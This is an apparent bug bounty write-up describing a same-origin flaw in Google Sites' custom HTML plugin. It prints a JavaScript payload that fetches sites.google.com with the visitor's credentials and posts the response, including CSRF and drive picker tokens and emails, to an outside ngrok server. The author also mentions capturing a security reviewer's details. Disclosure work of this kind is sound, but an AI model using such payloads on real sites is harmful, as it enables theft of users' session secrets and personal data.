Google sites and exploiting same origin policy.

I was learning about the same origin policy i.e; Response of ajax call can be captured only if the call is from same origin or headers like Access-Control-Origin/Credentials is present. (In simpler terms).

Google sites have an option to embed custom HTML and javascript. They are using Google Caja sandbox for security. I have noticed that if any ajax call is called from google sites embed plugin, then the origin remains to be sites.google.com. I decided to call sites.google.com itself from the HTML plugin.

I inserted the following JS code in the HTML plugin of https://sites.google.com/site/<redacted_any_site_name>

<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
var data=xhttp.responseText;
var xhttp1= new XMLHttpRequest();
xhttp1.open(“POST”,”https://c9244a0d.ngrok.io",true);
xhttp1.send(JSON.stringify({val:data}))
}
};
xhttp.open(“GET”, “https://sites.google.com", true);
xhttp.withCredentials = true;
xhttp.send()
</script>

Once the authenticated user visited https://sites.google.com/site/<redacted_any_site_name> I was able to get the victim’s sensitive information including CSRF token, drive picker token, emails, sites they are managing, currently logged in sites, etc. on my server logs via ngrok tunnel I have used in above code i.e. https://c9244a0d.ngrok.io.

It happens because I was calling sites.google.com from the same origin and hence able to capture the response.

After a few discussions, the bug was closed as Intended Behavior. I laughed because I know its a valid bug. Then again I re-opened it, I was able to capture details of security person checking this bug ( security.team.victim@gmail.com).

Bounty Awarded: $3133.70